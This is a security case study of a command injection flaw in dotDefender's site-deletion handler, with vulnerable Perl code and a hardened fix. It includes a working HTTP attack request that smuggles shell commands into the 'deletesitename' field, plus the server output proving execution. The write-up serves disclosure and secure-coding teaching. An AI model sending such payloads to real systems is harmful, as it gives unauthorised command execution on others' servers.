* What the problem is
dotDefender (http://applicure.com)
is a web application firewall (WAF) which 'prevents hackers from attacking your
website.'
The Site Management application of dotDefender is reachable as a web application
(https://[sitename]/dotDefender/) on the webserver. After passing the Basic Authentication
login, you can create/delete applications using dotDefender. The vulnerability described here
is in the 'deletesite' implementation and the 'deletesitename' variable. Insufficient
input validation allows an attacker to inject arbitrary shell commands.
Normal Delete Site Command:
POST /dotDefender/index.cgi HTTP/1.1
Host: 172.16.159.132
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://172.16.159.132/dotDefender/index.cgi
Authorization: Basic YWRtaW46
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

sitename=dotdefeater&deletesitename=dotdefeater&action=deletesite&linenum=14
An attack (request):
POST /dotDefender/index.cgi HTTP/1.1
Host: 172.16.159.132
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://172.16.159.132/dotDefender/index.cgi
Authorization: Basic YWRtaW46
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 95

sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15
Response to the attack request:
[...]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 12
drwxr-xr-x 3 root root 4096 Nov 23 02:37 .
drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..
drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin
/usr/local/APPCure-full/lib/admin
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 12
drwxr-xr-x 3 root root 4096 Nov 23 02:37 .
drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..
drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin
/usr/local/APPCure-full/lib/admin
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 12
drwxr-xr-x 3 root root 4096 Nov 23 02:37 .
drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..
drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin
/usr/local/APPCure-full/lib/admin
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 12
drwxr-xr-x 3 root root 4096 Nov 23 02:37 .
drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..
drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin
/usr/local/APPCure-full/lib/admin
[...]
Vulnerable code:
The vulnerability originates in the cleanIt function in applicure-lib2.pl.
This function is referenced from index1.cgi of the admin interface:
applicure-lib2.pl code snippet (original line numbers kept, as the text below refers to them):
13 sub cleanIt {
14     my($param,$type)=@_;
15
16     $param =~ s/%([a-fA-F0-9]{2})/pack "H2", $1/eg;
17     if ($type eq 'any') {
18     } elsif ($type eq 'filter') {
19         $param =~ s/\+/" "/eg;
20     } elsif ($type eq 'path') {
21         $param = un_urlize($param);
22         #$param =~ s/([^A-Za-z0-9\-_.\/~'])//g;
23         #$param =~ s/\+/" "/eg;
24     } else {
25         $param =~ s/([^A-Za-z0-9\-_.~'])//g;
26     }
27     return $param;
28 }
index1.cgi code snippet:
311
312 }elsif($action eq "deletesite") { # delete site
313     $deletesitename=$postFields{"deletesitename"};
314     $dots_index = index($deletesitename,"%3A");
315
316     if($dots_index != -1 ) {
317         $site_a_part=substr($deletesitename,0,$dots_index);
318         $site_b_part=substr($deletesitename,$dots_index+3,length($deletesitename)-$dots_index-2);
319         $site_a_part=&cleanIt($site_a_part);
320         $site_b_part=&cleanIt($site_b_part);
321         $deletesitename = $site_a_part.":".$site_b_part;
322     }
323
324     $linenum=$postFields{'linenum'};
325     applyDbAudit($action);
326     &delline($linenum,2);
327     cleanSiteFingerPrints($deletesitename);
328
329     &deleteSiteConf($deletesitename);
330     $site_params="$CTMP_DIR/".$deletesitename."_params";
331     system("rm -f $site_params");
* What could have prevented it?
A closer look at index1.cgi reveals that a system call is made at the end of the
code snippet listed above. Input that reaches such a system call, if not properly
sanitized, allows a user to insert malicious code that may compromise the host
system.
The cleanIt function called in index1.cgi is defined in applicure-lib2.pl (as listed
above). Its purpose is to sanitize the variables passed to it. One of those variables
is the site name that the client passes as a parameter to the deletesite command.
Here one can see that certain shell control characters are not protected by the
call to cleanIt. Thus an attacker can gain control of the system call on line 331
of index1.cgi via the deletesite command, as demonstrated above.
It is clear that a simple oversight in user input sanitization opened the door to a
major attack on the system. Preventing such an attack therefore begins with
identifying all the sources of user input and then sanitizing each source in the
context in which that input is used. In this specific case, the programmer did not
check the user input for the ";" character.
User input should always be validated.
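As an added example (not dotDefender's own code), a hardened version of the deletesite handling in Perl: the site name is percent-decoded and then checked against a strict allowlist before it is used, and rm is invoked with the list form of system() so that no shell ever parses the name. $CTMP_DIR is taken from the snippet above; the allowed name pattern and the sample inputs are assumptions.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Placeholder for the directory the real code reads from its configuration.
my $CTMP_DIR = '/tmp/ctmp';

# Returns the decoded site name if it matches the allowlist, undef otherwise.
# The value is decoded first and validated second, so an encoded ';' (%3B)
# cannot pass the check and turn into a metacharacter later.
# Assumed rule: letters, digits, '.', '_', '-' and an optional ':port' suffix.
sub validate_site_name {
    my ($raw) = @_;
    return undef unless defined $raw;
    (my $name = $raw) =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/eg;
    return undef unless $name =~ /\A[A-Za-z0-9][A-Za-z0-9._-]{0,63}(?::[0-9]{1,5})?\z/;
    return $name;
}

# Hardened replacement for lines 330-331 of the snippet above.
sub delete_site_params {
    my ($deletesitename) = @_;
    my $name = validate_site_name($deletesitename);
    die "deletesite: rejected site name\n" unless defined $name;
    my $site_params = "$CTMP_DIR/${name}_params";
    # List-form system() hands the arguments straight to execve(); with no
    # shell in the path, ';', '|' or '$(...)' in $name can never run as commands.
    # '--' stops a name starting with '-' from being read as an rm option.
    my $rc = system('rm', '-f', '--', $site_params);
    return $rc == 0;
}

# Constructed inputs: the normal request, the attack body from above,
# and an encoded ';' that only shows up after decoding.
for my $input ('dotdefeater', 'dotdefeater;id;ls -al ../;pwd;', 'site%3Bid') {
    my $verdict = defined(validate_site_name($input)) ? 'accepted' : 'rejected';
    printf "%-32s => %s\n", $input, $verdict;
}
```

Only the first input is accepted; the handler dies before any command runs for the other two, which is the fail-closed behaviour the original code lacks.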
* References
Bugtraq: Remote Command Execution in dotDefender Site Management
dotDefender: About dotDefender
securecoding.cert.org: Always Validate User Input